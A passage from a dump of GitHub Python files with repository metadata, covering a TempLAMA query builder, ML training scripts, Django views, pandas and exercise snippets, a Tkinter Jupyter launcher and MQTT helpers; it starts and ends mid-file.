val_frac:\n val_queries.append(query)\n else:\n test_queries.append(query)\n tot_queries += 1\n num_subj += 1\n if num_subj == max_subject_per_relation:\n break\n logging.info(\"%s: # subjects = %d # train = %d # val = %d # test = %d\",\n relation, len(subj2facts), len(train_queries),\n len(val_queries), len(test_queries))\n tot_subj += num_subj\n\n # Save all queries as a json.\n split2qrys = {\n \"train\": train_queries,\n \"val\": val_queries,\n \"test\": test_queries\n }\n tf.io.gfile.makedirs(out_dir)\n logging.info(\"Saving all queries to %s\", out_dir)\n for split in [\"train\", \"val\", \"test\"]:\n with tf.io.gfile.GFile(os.path.join(out_dir, f\"{split}.jsonl\"), \"w\") as f:\n for qry in split2qrys[split]:\n f.write(json.dumps(qry) + \"\\n\")\n\n # Make subdirectories and store each split.\n for year in range(min_year, max_year + 1):\n subd = os.path.join(out_dir, \"yearly\", str(year))\n tf.io.gfile.makedirs(subd)\n logging.info(\"Saving queries for %d to %s\", year, subd)\n counts = collections.defaultdict(int)\n for split in [\"train\", \"val\", \"test\"]:\n with tf.io.TFRecordWriter(os.path.join(subd, f\"{split}.tf_record\")) as f:\n for qry in split2qrys[split]:\n if qry[\"date\"] == str(year):\n f.write(_build_example(qry).SerializeToString())\n counts[split] += 1\n\n\ndef main(_):\n # Load relation templates.\n templates = read_templates()\n\n # Load entity names, number of facts and wiki page titles from SLING.\n qid_names, qid_mapping, qid_numfacts = load_sling_mappings(\n FLAGS.sling_kb_file, FLAGS.sling_wiki_mapping_file)\n\n # Load facts with qualifiers.\n all_facts = read_facts(FLAGS.facts_file, qid_mapping, FLAGS.min_year)\n\n # Create queries.\n create_queries(FLAGS.out_dir, all_facts, templates, qid_names, qid_numfacts,\n FLAGS.min_year, FLAGS.max_year, FLAGS.train_frac,\n FLAGS.val_frac, FLAGS.max_subject_per_relation)\n\n\nif __name__ == \"__main__\":\n app.run(main)\n","repo_name":"google-research/language","sub_path":"language/templama/templama.py","file_name":"templama.py","file_ext":"py","file_size_in_byte":16150,"program_lang":"python","lang":"en","doc_type":"code","stars":1525,"dataset":"github-code","pt":"95"} +{"seq_id":"5174333241","text":"import numpy as np\nimport argparse\n\nfrom speech_emotion_recognition.train import train\nfrom speech_emotion_recognition.config import LinguisticConfig, AcousticSpectrogramConfig, AcousticLLDConfig\nfrom speech_emotion_recognition.data_loader import load_acoustic_features_dataset, load_linguistic_dataset, load_spectrogram_dataset\nfrom speech_emotion_recognition.models import AttentionLSTM as RNN, CNN\nfrom speech_emotion_recognition.utils import set_default_tensor\nfrom speech_emotion_recognition.batch_iterator import BatchIterator\n\nNUM_ITERATIONS = 500\n\nLINGUISTIC_TUNING = True\n\nif __name__ == \"__main__\":\n for i in range(NUM_ITERATIONS):\n params = {}\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-m\", \"--model_type\", type=str, default=\"linguistic\")\n args = parser.parse_args()\n\n set_default_tensor()\n\n if args.model_type == \"linguistic\":\n test_features, test_labels, val_features, val_labels, train_features, train_labels = load_linguistic_dataset()\n params[\"hidden_dim\"] = np.random.randint(50, 500)\n params[\"dropout\"] = 0.5 + np.random.rand() * 0.4\n params[\"dropout2\"] = 0.2 + np.random.rand() * 0.6\n params[\"reg_ratio\"] = np.random.rand()*0.0015\n params[\"batch_size\"] = np.random.randint(64, 256)\n params[\"seq_len\"] = np.random.randint(20, 30)\n cfg = LinguisticConfig(**params)\n model = RNN(cfg)\n\n elif args.model_type == \"acoustic-lld\":\n test_features, test_labels, val_features, val_labels, train_features, train_labels = load_acoustic_features_dataset()\n params[\"n_layers\"] = np.random.randint(1, 4)\n params[\"hidden_dim\"] = np.random.randint(10, 100)\n params[\"dropout\"] = 0.5 + np.random.rand() * 0.4\n params[\"dropout2\"] = 0.5 + np.random.rand() * 0.45\n params[\"reg_ratio\"] = np.random.rand()*0.0015\n params[\"batch_size\"] = np.random.randint(26,256)\n params[\"bidirectional\"] = bool(np.random.randint(0, 2))\n cfg = AcousticLLDConfig(**params)\n model = RNN(cfg)\n\n elif args.model_type == \"acoustic-spectrogram\":\n test_features, test_labels, val_features, val_labels, train_features, train_labels = load_spectrogram_dataset()\n params[\"fc_size\"] = np.random.randint(10, 200)\n params[\"dropout\"] = 0.3 + np.random.rand() * 0.6\n cfg = AcousticSpectrogramConfig(**params)\n model = CNN(cfg)\n\n else:\n raise Exception(\"model_type parameter has to be one of [linguistic|acoustic-lld|acoustic-spectrogram]\")\n\n print(\"Subsets sizes: test_features:{}, test_labels:{}, val_features:{}, val_labels:{}, train_features:{}, train_labels:{}\".format(\n test_features.shape[0], test_labels.shape[0], val_features.shape[0], val_labels.shape[0], train_features.shape[0], train_labels.shape[0])\n )\n\n \"\"\"Creating data generators\"\"\"\n test_iterator = BatchIterator(test_features, test_labels)\n train_iterator = BatchIterator(train_features, train_labels, cfg.batch_size)\n validation_iterator = BatchIterator(val_features, val_labels)\n\n train(model, cfg, test_iterator, train_iterator, validation_iterator)\n","repo_name":"PiotrSobczak/speech-emotion-recognition","sub_path":"speech_emotion_recognition/run_hyperparameter_tuning.py","file_name":"run_hyperparameter_tuning.py","file_ext":"py","file_size_in_byte":3300,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"95"} +{"seq_id":"19127608084","text":"import requests\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom rest_framework import status\nfrom forms.forms import UploadFileForm\nfrom hydra.utils import get_original_cwd\nfrom app.Microservices import ConfigMicroservice, LoggingMicroservice\n\nconfig_service = ConfigMicroservice()\nlogging_service = LoggingMicroservice()\n\nlogger = logging_service.get_logger(__name__)\nlog_file = f\"{get_original_cwd()}/logs/mednotes.log\"\n\n@login_required\ndef dashboard(request):\n if request.method == \"POST\":\n form = UploadFileForm(request.POST, request.FILES)\n if form.is_valid():\n audio_file = request.FILES[\"file\"]\n upload_file_url = f\"{config_service.get_config('upload_service_url')}/api/upload_file/\"\n response = requests.post(upload_file_url, files={\"file\": audio_file})\n if response.status_code == status.HTTP_201_CREATED:\n return redirect(\"success\")\n else:\n messages.error(request, \"Error occurred during file upload\")\n logger.error(\"Error occurred during file upload\")\n else:\n form = UploadFileForm()\n\n return render(request, \"templates/html/dashboard.html\", {\"form\": form})\n\n","repo_name":"redmage123/mednotes","sub_path":"app/microservices/client_connectivity_microservice/views/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"16929880772","text":"import pandas as pd\nimport numpy as np\n\ndata = {\n \"Column1\": [1,2,3,4,5],\n \"Column2\": [10,20,13,45, 25],\n \"Column3\": [\"abc\", \"bcaa\", \"ade\", \"cba\", \"de\"]\n}\n\ndf = pd.DataFrame(data)\n\nresult = df\n\n'''\nresult = df[\"Column2\"].unique() # tekrar etmeyen bilgileri yazdırır bilgi tekrar ediyorsa yazdırmaz.\nresult = df[\"Column2\"].nunique() # kaç tane tekrar etmeyen veri olduğunun sayısını yazdırır.\nresult = df[\"Column2\"].value_counts() # Tekrar eden veriyi ve sayısını yazdırır\n'''\n\ndef kareal(x):\n return x * x\n\nkareal2 = lambda x: x*x\n\n# result = df[\"Column1\"] * 2\n# result = df[\"Column1\"].apply(kareal) # Column1 için fonksiyon görevlendiririz ve fonksiyon o sütündaki tüm veriler için çalışır\n# result = df[\"Column1\"].apply(kareal2) # lambda metodu da verebiliriz\n# result = df[\"Column3\"].apply(len) # değerin kaç karakter olduğunu yazdırır.\n\ndf[\"Column4\"] = df[\"Column3\"].apply(len) # değerin kaç karakter olduğunu yeni kolona yazdırır.\n\n# result = df.columns\n# result = len(df.columns)\n\n# result = df.index\n# result = len(df.index)\n\n# result = df.info\n\n# result = df.sort_values(\"Column2\") # int veriler büyüklüğe göre sıralanır\n# result = df.sort_values(\"Column3\") # str veriler alfabeye göre sıralanır\n# result = df.sort_values(\"Column3\", ascending = False) # ascending str için True ise alfabeye göre False ise tersine\n# # int için tersine düzüne göre yine ayarlanıyor\n\n\n\nprint(result)","repo_name":"BerkYxvuz/My_Some_Python_Projects","sub_path":"PANDAS/DF metodları/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"20418756840","text":"def main ():\n gab = []\n cartao(gab)\n n = int(input(\"Digite o número de alunos: \"))\n for j in range (n):\n lista = []\n cartao(lista)\n comp (lista, gab)\n print(\"O aluno %d teve %d acertos.\"%(j+1,acerto))\n\ndef cartao(lista):\n for i in range (30):\n q = input(\"Digite a resposta %d de 30: \"%(i+1))\n lista.append(q)\n return lista\n\ndef comp (lista, gab):\n acerto = 0\n for i in range (30):\n if lista[i] == gab[1]:\n acerto += 1\n return acerto\nmain ()\n","repo_name":"luizdefranca/Curso-Python-IgnoranciaZero","sub_path":"Aulas Python/Exercícios Extras/ime usp/6. Exercícios com Vetores/6.2 - Número de Acertos na Prova.py","file_name":"6.2 - Número de Acertos na Prova.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"36060232593","text":"from datetime import timedelta\nfrom time import timezone\n\nfrom django.shortcuts import render\n\nfrom exerice2_principal.models import Livre, Etudiant, Emprunteur\n\n\n# a) Renvoyer la liste de tous les livres de la bibliothèque.\n\ndef all_livres(request):\n livres = Livre.objects.all()\n return render(request, \"livres.html\", {'livres': livres})\n\n\n# b) Afficher les détails d'un étudiant particulier\n\ndef get_student(request, id):\n student = Etudiant.objects.all().get(id=id)\n return render(request, 'etudiant.html', {'etudiant': student})\n\n\n# c) Chercher un livre par leur ISBN\n\ndef get_livre_par_isbn(request, isbn):\n livre = Livre.objects.all().get(isbn=isbn)\n return render(request, 'user.html', {'livre': livre})\n\n\n# d) Obtenir un emprunt (cette méthode prend en paramètre id du livre souhaité, vérifie la disponibilité du livre\n# ainsi si numOuvrage emprunté par l’étudiant connecté est inférieur à 5 livres)\n# NB. date_de_sortie est la date d’obtention de l’emprunte, date_de_retour est date_de_sortie + 14 jours\n\ndef get__emprunt(request, id_livre):\n livre = Livre.objects.all().get(id=id_livre)\n etudiant = Etudiant.objects.get(id=request.user.id)\n if livre.disponible and etudiant.numOuvrage < 5:\n date_de_sortie = timezone.now().date()\n date_de_retour = date_de_sortie + timedelta(days=14)\n\n emprunt = Emprunteur(\n date_de_sortie=date_de_sortie,\n date_de_retour=date_de_retour,\n etudiant=etudiant,\n livre=livre\n )\n emprunt.save()\n return emprunt\n else:\n return None\n\n# question c\n# 1- Ajouter 'django.contrib.auth' dans la liste INSTALLED_APPS de votre fichier settings.py\n\n# 2- Exécuter la commande python manage.py migrate pour appliquer les migrations nécessaires à la création des tables d'authentification dans la base de données.\n\n# 3- Configurer les URL pour l'authentification dans votre fichier urls.py\n\n# 4- Configurer les paramètres d'authentification dans votre fichier settings.py. Vous pouvez spécifier la vue de connexion par défaut et la page vers laquelle rediriger après la connexion ou la déconnexion :\n\n# LOGIN_REDIRECT_URL = 'home'\n# LOGOUT_REDIRECT_URL = 'login'\n\n# 5- Utiliser les décorateurs fournis par \"django.contrib.auth.decorators\" ==> \"@login_required\" pour protéger les vues nécessitant une authentification.\n","repo_name":"YoussefElmoudene/Revision_Exam","sub_path":"exerice2_principal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2402,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"6615204761","text":"import logging\nfrom collections import defaultdict\n\nimport torch\nimport numpy as np\nfrom sklearn.metrics import classification_report, SCORERS\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegressionCV\n\nlog = logging.getLogger(__name__)\n\n\nclass DiagnosticClassifier:\n def __init__(self, dataloader, model, device, feature_size, meta_keys, n_points):\n self.dataloader = dataloader\n self.model = model\n self.meta_keys = meta_keys\n self.feature_size = feature_size\n self.n_points = n_points\n self.device = device\n\n def build_xy(self):\n log.info(\"Building X, Y\")\n X = []\n Ys = defaultdict(list)\n\n self.model.eval()\n with torch.no_grad():\n print_freq = self.n_points // self.dataloader.batch_size\n for batch_idx, (x, y, meta) in enumerate(self.dataloader):\n x = x.to(self.device)\n x = self.model.get_features(x).detach().cpu().numpy()\n X.extend(x)\n\n for key in self.meta_keys:\n Ys[key].extend([m[key] for m in meta])\n\n if batch_idx % print_freq == 0:\n log.info(\"\\t{} of {} done\".format(len(X), self.n_points))\n\n if len(X) >= self.n_points:\n break\n\n X = np.array(X[:self.n_points])\n for key in Ys:\n Ys[key] = np.array(Ys[key][:self.n_points])\n log.info(\"\\t.. complete\")\n return X, Ys\n\n def run(self):\n X, ys = self.build_xy()\n\n results = {}\n for key in ys:\n y = ys[key]\n X_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=0.2)\n\n log.info(\"{}: Fitting a logistic regression model (CV=5)\".format(key))\n clf = LogisticRegressionCV(scoring=\"f1_micro\", cv=3, max_iter=250)\n clf.fit(X_train, y_train)\n\n train_results = classification_report(\n y_train, clf.predict(X_train), output_dict=True)\n test_results = classification_report(\n y_test, clf.predict(X_test), output_dict=True)\n\n results[key] = {\n \"train\": train_results,\n \"test\": test_results\n }\n\n return results\n","repo_name":"oranguh/rhythmz","sub_path":"models/diag_classifier.py","file_name":"diag_classifier.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"11869697566","text":"import platform\nfrom os import environ as env\nimport sys\n\nimport requests\n\n\ndef main(rust_name):\n system_aliases = {\n 'Darwin': 'macosx',\n 'Linux': 'linux',\n 'Windows': 'windows'\n }\n system_name = system_aliases[platform.system()]\n name_fmt = (rust_name, system_name, platform.machine())\n name = \"{0}-{1}-{2}.tar.gz\".format(*name_fmt)\n files = {name: open('./release.tar.gz', 'rb')}\n resp = requests.post(env['NGROK_URL'], files=files)\n assert resp.ok\n\nif __name__ == '__main__':\n rust_name = sys.argv[1]\n main(rust_name)\n","repo_name":"bmcorser/travis-compile","sub_path":"sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"19714356265","text":"\"\"\"\nhttps://judge.softuni.org/Contests/Practice/Index/1680#0\n\nДадени са 2*n-на брой числа. Първото и второто формират двойка, третото и четвъртото също и т.н.\nВсяка двойка има стойност – сумата от съставящите я числа. Напишете програма, която проверява дали всички\nдвойки имат еднаква стойност или печата максималната разлика между две последователни двойки.\nАко всички двойки имат еднаква стойност, отпечатайте \"Yes, value={Value}\" + стойността.\nВ противен случай отпечатайте \"No, maxdiff={Difference}\" + максималната разлика.\n\"\"\"\n\npairs_count = int(input())\nprevious_sum = int(input()) + int(input())\nmax_diff = 0\n\nfor _ in range(pairs_count - 1): # -1 защото първата двойка вече е вписана като previous_sum, още в началния input\n current_sum = int(input()) + int(input())\n sum_diff = abs(previous_sum - current_sum)\n if sum_diff > max_diff:\n max_diff = sum_diff\n\n previous_sum = current_sum #в тялото на цикъла презаписваме променливата previous_sum\n\nif max_diff == 0:\n print(f\"Yes, value={previous_sum}\")\nelse:\n print(f\"No, maxdiff={max_diff}\")\n\n# -----------------------------------------------------\n\n# pairs_count = int(input())\n#\n# curr_pair_sum = 0\n# previous_sum = 0\n# max_diff = 0\n#\n# for i in range(2 * pairs_count):\n# curr = int(input())\n# curr_pair_sum += curr\n#\n# if i % 2 != 0 and i >= 3:\n# pairs = abs(curr_pair_sum - previous_sum)\n# if max_diff < pairs:\n# max_diff = pairs\n# previous_sum = curr_pair_sum\n# curr_pair_sum = 0\n#\n# elif i % 2 != 0 and i >= 1:\n# previous_sum = curr_pair_sum\n# curr_pair_sum = 0\n#\n# if max_diff == 0:\n# print(f\"Yes, value={previous_sum}\")\n# else:\n# print(f\"No, maxdiff={max_diff}\")\n\n# -----------------------------------------------------\n\n# pairs_count = int(input())\n#\n# curr_pair_sum = 0\n# previous_sum = 0\n# max_diff = 0\n#\n# for i in range(2 * pairs_count):\n# curr = int(input())\n# curr_pair_sum += curr\n#\n# if i % 2 != 0 and i >= 3:\n# max_diff = max(max_diff, abs(curr_pair_sum - previous_sum))\n# previous_sum = curr_pair_sum\n# curr_pair_sum = 0\n#\n# elif i % 2 != 0 and i >= 1:\n# previous_sum = curr_pair_sum\n# curr_pair_sum = 0\n#\n# if max_diff == 0:\n# print(f\"Yes, value={previous_sum}\")\n# else:\n# print(f\"No, maxdiff={max_diff}\")","repo_name":"kkirev/SoftUni","sub_path":"Programming Basics/04_more_exercises/equal_pairs.py","file_name":"equal_pairs.py","file_ext":"py","file_size_in_byte":2784,"program_lang":"python","lang":"bg","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"17918754238","text":"n = int(input())\nw = [0]\nfor i in range(n):\n w.append(int(input()))\n#print(w)\n\n# DP : 한 번 계산한 문제는 다시 계산하지 않도록 하는 알고리즘\ndp = [0]\ndp.append(w[1]) # 첫번째 포도주 와인잔의 양을 dp 변수에 담기\n#print(dp)\n\nif n > 1:\n dp.append(w[1] + w[2]) # 첫번재 포도주의 양과 두번째 포도주의 양을 더한 누적 값이 담기게 됩니다.\n #print(dp,'ㅇㄹ')\n\n# 세번째부터는 규칙성이 발견되어 규칙성 코드를 작성 \nfor i in range(3, n + 1):\n dp.append(max(dp[i - 1], dp[i - 3] + w[i - 1] + w[i], dp[i - 2] + w[i])) # 4번째 부터의 dp의 규칙성\n #print(dp)\nprint(dp[n])\n","repo_name":"wldntls/TIL","sub_path":"algorithm/week 4/BOJ_2156.py","file_name":"BOJ_2156.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"10568643961","text":"from tkinter import *\nfrom tkinter.ttk import *\nfrom tkinter import filedialog\nimport os \nimport subprocess\nimport configparser\nimport os\nimport json\n\n\"\"\"\nThis Python script uses Tkinter to create a GUI for opening Jupyter (IPython) notebooks using different Python environments and working directories.\n\nMade by: Ties de Kok\nContact: T.C.J.dekok@tilburguniversity.edu\nLicense: MIT\nVersion: 0.1.0\n\"\"\"\n\nclass GUI:\n def __init__(self, rootWindow):\n \n self._config_dir = os.path.join(os.environ['APPDATA'], 'notebook_opener')\n self._config_file = os.path.join(self._config_dir, 'config.ini')\n self.config = configparser.ConfigParser()\n \n self.check_config_dir()\n self.config.read(self._config_file)\n \n self.home = os.path.expanduser(\"~\")\n \n self.button_notebook = IntVar()\n self.button_notebook.set(1)\n\n self.check1 = Checkbutton(rootWindow, text=\"Open notebook\", variable=self.button_notebook, onvalue=1, offvalue=0)\n self.check1.grid(row=9, column=10, columnspan=2)\n \n self.label = Label(rootWindow, text='Jupyter (IPython) Notebook Opener')\n self.label.grid(row=0, column=6, columnspan=6, pady=10)\n\n self.button1 = Button(rootWindow, text=\"Start\", command=self.enter)\n self.button1.grid(row=8, column=10, columnspan=2)\n \n self.button2 = Button(rootWindow, text=\"Browse\", command=self.getDir)\n self.button2.grid(row=6, column=6)\n \n self.button3 = Button(rootWindow, text='Add', command=self.add)\n self.button3.grid(row=9, column=3, pady=5)\n \n self.button4 = Button(rootWindow, text='Remove', command=self.remove)\n self.button4.grid(row=9, column=4, pady=5)\n \n self.button5 = Button(rootWindow, text='Add', command=self.add_1)\n self.button5.grid(row=9, column=0, pady=5)\n \n self.button6 = Button(rootWindow, text='Remove', command=self.remove_1)\n self.button6.grid(row=9, column=1, pady=5)\n \n self.label1 = Label(rootWindow, text='Python environments')\n self.label1.grid(row=0, column=0, columnspan=2)\n self.label2 = Label(rootWindow, text='Saved directories')\n self.label2.grid(row=0, column=3, columnspan=2)\n \n self.label_about = Label(rootWindow, text='Made by Ties de Kok | GitHub: https://github.com/TiesdeKok/')\n self.label_about.grid(row=10, column=0, columnspan=5, pady=5)\n \n self.listbox = Listbox(rootWindow, width = 30, selectmode=SINGLE)\n self.listbox.grid(row=1, column=3, columnspan=2, rowspan=8, padx=10)\n self.listbox.bind('<>', self.onselect)\n \n self.lbpython = Listbox(rootWindow, width = 30, selectmode=SINGLE)\n self.lbpython.grid(row=1, column=0, columnspan=2, rowspan=8, padx=10)\n self.lbpython.bind('<>', self.onselect_1)\n \n self.text = Entry(rootWindow, width=80, background=\"ivory\")\n self.text.grid(row=6, column=7, columnspan=5, padx=8)\n \n self.label_python = Label(rootWindow, text='Current Python selection:')\n self.label_python.grid(row=8, column=6, columnspan=2)\n self.label_env = Label(rootWindow, text='No selection.')\n self.label_env.grid(row=8, column=8, columnspan=2, sticky=W)\n \n self.label_description = Label(rootWindow, text = 'After selecting a Python environment and a working directory click Start to launch the notebook. \\n'\n ' It is possible to save the environment and working directory using the Add / Remove buttons.')\n self.label_description.grid(row=1, column=6, columnspan=6, rowspan=5, ipady=7)\n \n self.label_error = Label(rootWindow, text = '', foreground='red', font = \"TkDefaultFont 14 bold\")\n self.label_error.grid(row=9, column=6, columnspan=4)\n \n self.load_stored()\n \n rootWindow.bind(\"\", lambda event: self.enter())\n rootWindow.wm_title(\"Notebook Opener\")\n \n def add(self):\n def process():\n self.listbox.insert(END, name.get())\n self.listbox_dict[name.get()] = self.text.get()\n temp = self.listbox_to_dict(self.listbox_dict, self.listbox)\n self.config.set('Stored dictionaries', 'dirs', json.dumps(temp))\n self.update_config()\n toplevel.destroy()\n \n toplevel = Toplevel()\n toplevel.attributes('-topmost', True)\n toplevel.attributes('-topmost', False)\n label = Label(toplevel, text='Provide a name:')\n label.grid(row=0, pady=5)\n name = Entry(toplevel, width = 30, background='ivory')\n name.grid(row=1, pady=5, padx=10)\n name.focus()\n button = Button(toplevel, text='Submit', command=process)\n button.grid(row=2, pady=5)\n toplevel.bind(\"\", lambda event: process())\n \n def add_1(self):\n def process():\n self.lbpython.insert(END, name.get())\n self.lbpython_dict[name.get()] = script.get()\n temp = self.listbox_to_dict(self.lbpython_dict, self.lbpython)\n self.config.set('Stored dictionaries', 'python_env', json.dumps(temp))\n self.update_config()\n toplevel.destroy()\n \n def getFile():\n fileName = filedialog.askopenfilename(initialdir=self.home, filetypes=[('Batch script', '*.bat')], title='Select your script file:', parent=toplevel)\n script.delete(0, 'end')\n script.insert(INSERT, fileName)\n name.focus()\n \n toplevel = Toplevel()\n toplevel.attributes('-topmost', True)\n toplevel.attributes('-topmost', False)\n label = Label(toplevel, text='Provide the script path:')\n label.grid(row=0, pady=5)\n script = Entry(toplevel, width = 80, background='ivory')\n script.grid(row=1, pady=5, padx=10)\n script.focus()\n button_1 = Button(toplevel, text='Browse', command=getFile)\n button_1.grid(row=2, pady=5)\n label_1 = Label(toplevel, text='Provide a name:')\n label_1.grid(row=3, pady=5)\n name = Entry(toplevel, width = 30, background='ivory')\n name.grid(row=4, pady=5)\n button = Button(toplevel, text='Submit', command=process)\n button.grid(row=5, pady=5)\n toplevel.bind(\"\", lambda event: process())\n \n def remove(self):\n if not len(self.listbox_dict) == 0:\n index = self.listbox.curselection()[0]\n self.listbox_dict.pop(self.listbox.get(index))\n self.listbox.delete(index)\n temp = self.listbox_to_dict(self.listbox_dict, self.listbox)\n self.config.set('Stored dictionaries', 'dirs', json.dumps(temp))\n self.update_config()\n \n def remove_1(self):\n if not len(self.lbpython_dict) == 0:\n if not self.lbpython.get(self.lbpython.curselection()[0]) == 'Default Python':\n index = self.lbpython.curselection()[0]\n self.lbpython_dict.pop(self.lbpython.get(index))\n self.lbpython.delete(index)\n temp = self.listbox_to_dict(self.lbpython_dict, self.lbpython)\n self.config.set('Stored dictionaries', 'python_env', json.dumps(temp))\n self.update_config()\n \n def enter(self):\n if self.text.get() == '':\n work_dir = self.home\n else:\n work_dir = self.text.get()\n \n if not self.check_python() == 'failed':\n if self.button_notebook.get() == 1:\n version = self.check_version()\n if not version == \"failed\":\n if version >= 4:\n command = 'cmd.exe /k %s && cd /d %s && jupyter notebook' % (self.current_python, work_dir)\n else:\n command = 'cmd.exe /k %s && cd /d %s && ipython notebook' % (self.current_python, work_dir)\n subprocess.Popen(command, creationflags=subprocess.CREATE_NEW_CONSOLE)\n self.label_error.config(text = '')\n else:\n self.label_error.config(text = 'Error: IPython could not be found.')\n else:\n command = 'cmd.exe /k %s && cd /d %s' % (self.current_python, work_dir)\n subprocess.Popen(command, creationflags=subprocess.CREATE_NEW_CONSOLE)\n self.label_error.config(text = '')\n else:\n self.label_error.config(text = 'Error: Python environment not valid.')\n \n def onselect(self, arg):\n if not len(self.listbox_dict) == 0:\n index = self.listbox.curselection()[0]\n value = self.listbox_dict[self.listbox.get(index)]\n self.text.delete(0, 'end')\n self.text.insert(INSERT, value)\n \n def onselect_1(self, arg):\n if not len(self.lbpython_dict) == 0:\n index = self.lbpython.curselection()[0]\n value = self.lbpython_dict[self.lbpython.get(index)]\n self.label_env.config(text = self.lbpython.get(index))\n self.current_python = value\n \n def getDir(self):\n dirName = filedialog.askdirectory(initialdir=self.home)\n self.text.delete(0, 'end')\n self.text.insert(INSERT, dirName)\n \n def check_version(self):\n if self.label_env.cget(\"text\") == 'Default Python':\n cmd = ['cmd.exe', '/k', 'python', '-c', \"import IPython; print('findme' + IPython.__version__)\"]\n else:\n cmd = ['cmd.exe', '/k', self.current_python, '&&' 'python', '-c', \"import IPython; print('findme' + IPython.__version__)\"]\n p = subprocess.Popen(cmd, creationflags= 0x08000000, stdin=subprocess.PIPE, stdout = subprocess.PIPE)\n output = ' '.join([x.decode('utf-8') if x != None else \"\" for x in p.communicate()])\n try:\n version = int(re.search('(?<=findme).', output).group(0))\n return version\n except:\n return \"failed\"\n \n def check_python(self):\n cmd = ['cmd.exe', '/k', self.current_python, '||', 'ECHO', 'statusfailed']\n p = subprocess.Popen(cmd, creationflags= 0x08000000, stdin=subprocess.PIPE, stdout = subprocess.PIPE)\n output = p.communicate()[0].decode(\"utf-8\")\n if re.search('statusfailed', output):\n return \"failed\"\n else:\n return \"success\" \n \n def check_config_dir(self):\n if not os.path.exists(self._config_dir):\n os.makedirs(self._config_dir)\n if not os.path.isfile(self._config_file):\n with open(self._config_file, 'w') as configfile:\n self.config.add_section('Stored dictionaries')\n self.config.set('Stored dictionaries', 'python_env', '{\"Default Python\": [0, \"ECHO Default\"]}')\n self.config.set('Stored dictionaries', 'dirs', '{}')\n self.config.write(configfile)\n \n def ConfigSectionMap(self, section):\n dict1 = {}\n options = self.config.options(section)\n for option in options:\n try:\n dict1[option] = self.config.get(section, option)\n if dict1[option] == -1:\n DebugPrint(\"skip: %s\" % option)\n except:\n dict1[option] = None\n return dict1\n \n def listbox_to_dict(self, lb_dict, lb):\n out_dict = {}\n if len(lb_dict) > 0:\n for x in range(0, len(lb_dict)):\n out_dict[lb.get(x)] = x\n return_dict = {a : (b, c) for a, b, c in zip(list(lb_dict.keys()), list(out_dict.values()), list(lb_dict.values()))}\n return return_dict\n else:\n pass\n \n def update_config(self):\n with open(self._config_file, 'w') as configfile:\n self.config.write(configfile)\n \n def load_stored(self):\n temp_env = json.loads(self.ConfigSectionMap(\"Stored dictionaries\")['python_env'])\n self.lbpython_dict = {x : y[1] for x, y in temp_env.items()}\n for x, y in temp_env.items():\n self.lbpython.insert(y[0], x)\n self.current_python = self.lbpython_dict['Default Python']\n self.label_env.config(text = 'Default Python')\n \n temp_dirs = json.loads(self.ConfigSectionMap(\"Stored dictionaries\")['dirs'])\n if len(temp_dirs) > 0:\n self.listbox_dict = {x : y[1] for x, y in temp_dirs.items()}\n for x, y in temp_dirs.items():\n self.listbox.insert(y[0], x)\n else:\n self.listbox_dict = {} \n\nif __name__ == '__main__':\n rootWindow = Tk()\n gui = GUI(rootWindow)\n rootWindow.mainloop()","repo_name":"TiesdeKok/NotebookOpener","sub_path":"notebook_opener.py","file_name":"notebook_opener.py","file_ext":"py","file_size_in_byte":12826,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"95"} +{"seq_id":"38485921396","text":"import posixpath\nimport os\nimport yaml\nfrom datetime import datetime, timedelta\nfrom operator import itemgetter\n\n\ndef extract_face_predictions(analysis):\n predictions = []\n if analysis:\n try:\n for bucket in analysis:\n if 'api' in bucket and bucket['api'] == 'faces':\n # find the 'faces' api if it exists\n if 'found' in bucket:\n results = bucket['found']\n if 'success' in results and results['success'] and 'predictions' in results:\n # Find the 'predictions' if they exist\n predictions = results['predictions']\n break\n except KeyError as ex:\n print(ex)\n return predictions\n\n\ndef add_field_to_path_if_exists(payload_obj, source_dir, field, prefix=\"\"):\n if prefix and field in payload_obj:\n return posixpath.join(source_dir, prefix, payload_obj[field])\n elif field in payload_obj:\n return posixpath.join(source_dir, payload_obj[field])\n return ''\n\n\ndef does_needle_match_haystack_topic(needle_string, haystack_string):\n # AppDaemon subscriptions only seem to work with specific topics, no wildcards -\n # described in https://buildmedia.readthedocs.org/media/pdf/appdaemon/stable/appdaemon.pdf\n # This parses through all message topics (the \"haystack\"), and returns true if a \"needle\" matches\n # Needles can be of the format: \"BlueIris/+/Status\" or \"BlueIris/alerts/+\" with + being a wildcard\n\n needle = needle_string.split(\"/\")\n haystack = haystack_string.split(\"/\")\n\n # Good solution if equal\n if needle == haystack:\n return True\n if len(needle) < len(haystack):\n return False\n\n # Check all subtopics for a match or wildcard match\n for i in range(len(needle)):\n s_needle = needle[i]\n if i < len(haystack):\n s_haystack = haystack[i]\n else:\n return False\n\n # Handle wildcards\n if s_haystack == \"#\":\n return True\n if not (s_haystack == \"+\" or s_haystack == s_needle):\n return False\n\n # Tried all steps, and nothing broke the pattern, so return true\n return True\n\n\ndef substring_after(s, 